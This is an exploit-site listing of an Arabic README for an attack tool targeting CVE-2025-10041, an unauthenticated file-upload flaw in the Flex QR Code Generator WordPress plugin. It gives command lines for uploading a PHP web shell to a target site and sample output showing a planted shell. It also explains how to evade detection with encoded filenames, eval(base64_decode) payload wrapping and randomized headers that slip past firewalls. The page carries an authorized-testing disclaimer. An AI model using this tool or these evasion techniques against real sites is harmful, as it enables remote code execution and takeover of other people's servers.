Sploitus

Exploit for CVE-2025-10041

kitploit · 2026-09-03

Exploit Code

MARKDOWN147 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-NXPLOITED-CVE-2025-10041
# CVE-2025-10041

Flex QR Code Generator <= 1.2.5 - رفع ملفات اعتباطي بدون مصادقة

# 🚨 Flex QR Code Generator ≤ 1.2.5 - رفع ملفات اعتباطي بدون مصادقة

* * *

## 📝 الوصف

إضافة **Flex QR Code Generator** لووردبريس معرضة لرفع ملفات اعتباطي بسبب عدم التحقق من نوع الملف في دالة `save_qr_code_to_db()` في جميع الإصدارات حتى `1.2.5` ضمناً.  
يسمح ذلك لـ **المهاجمين بدون مصادقة** برفع ملفات ضارة على خادم الموقع المستهدف، مما قد يؤدي إلى تنفيذ تعليمات برمجية عن بُعد.

  * **CVE:** `CVE-2025-10041`
  * **CVSS:** `9.8 (حرج)`



* * *

## 💡 حول هذا السكريبت

`CVE-2025-10041.py` هو أداة استغلال احترافية مصممة لأتمتة الهجوم من خلال استغلال هذه الثغرة.  
توفر ميزات متقدمة لتجاوس الحمايات الشائعة وتقنيات الترميز.

* * *

## ⚙️ الميزات

  * **اكتشاف تلقائي للثغرة** (فحص الإصدار)
  * **رفع ملفات اعتباطي** (بما في ذلك قوالب PHP)
  * **تجاوس ترميز اسم الملف** : Base64 أو URL
  * **تجاوس ترميز المحتوى** : غلاف Base64 PHP لشفرة القالب
  * **رؤوس HTTP عشوائية** لتجنب جدران الحماية الأساسية
  * **دعم الرؤوس المخصصة**
  * **واجهة سطر أوامر كاملة** مع تحليل الوسائط ورسالة المساعدة



* * *

## 🖥️ طريقة الاستخدام

### 1\. **الاستغلال الأساسي**

root@kitploit:~
    
    
    python3 CVE-2025-10041.py -u http://target.com
    

### 2\. **ترميز اسم القالب**

root@kitploit:~
    
    
    python3 CVE-2025-10041.py -u http://target.com --encode_filename base64
    python3 CVE-2025-10041.py -u http://target.com --encode_filename url
    

### 3\. **ترميز محتوى القالب**

root@kitploit:~
    
    
    python3 CVE-2025-10041.py -u http://target.com --encode_content base64
    

### 4\. **اسم ملف القالب المخصص**

root@kitploit:~
    
    
    python3 CVE-2025-10041.py -u http://target.com --shellname myevil.php
    

### 5\. **متقدم (دمج الخيارات)**

root@kitploit:~
    
    
    python3 CVE-2025-10041.py -u http://target.com --encode_content base64 --encode_filename base64 --shellname myevil.php
    

### 6\. **رؤوس مخصصة**

root@kitploit:~
    
    
    python3 CVE-2025-10041.py -u http://target.com --headers "X-Forwarded-For: 127.0.0.1" "Cookie: PHPSESSID=1337"
    

* * *

## 🆘 المساعدة

لعرض جميع الخيارات المتاحة وتعليمات الاستخدام:

root@kitploit:~
    
    
    python3 CVE-2025-10041.py --help
    

* * *

## 🔓 تقنيات التجاوس

  * **ترميز اسم الملف** : بعض الخوادم تحظر `.php` أو الأسماء المشبوهة؛ الترميز قد يتجاوز الفلاتر.
  * **ترميز المحتوى** : تضمين شفرة القالب داخل `eval(base64_decode(...))` قد يتجاوز فلاتر المحتوى.
  * **رؤوس عشوائية** : تدوير وكيل المستخدم والمرجع وملفات تعريف الارتباط لتجنب الاكتشاف.
  * **رؤوس مخصصة** : إضافة رؤوسك الخاصة لتجاوس متقدم.



* * *

## 📋 مثال على المخرجات

root@kitploit:~
    
    
    Checking vulnerability version...
    Target is vulnerable ...
    Exploiting ...
    Uploading shell 'shell.php' ...
    Shell uploaded successfully.
    Shell path (guess): /wp-content/uploads/shell_3.php
    Response: {...}
    

* * *

## ⚠️ إخلاء مسؤولية

هذا السكريبت مقدم **لأغراض تعليمية وبحثية واختبارات الاختراق المصرح بها فقط**.  
**الاستخدام غير المصرح به** ضد أنظمة لا تملكها أو ليس لديك إذن صريح باختبارها ممنوع منعاً باتاً وغير قانوني.  
المؤلف **غير مسؤول** عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.

* * *

## ✍️ من إعداد:

_Nxploited (Khaled Alenazi)_

* * *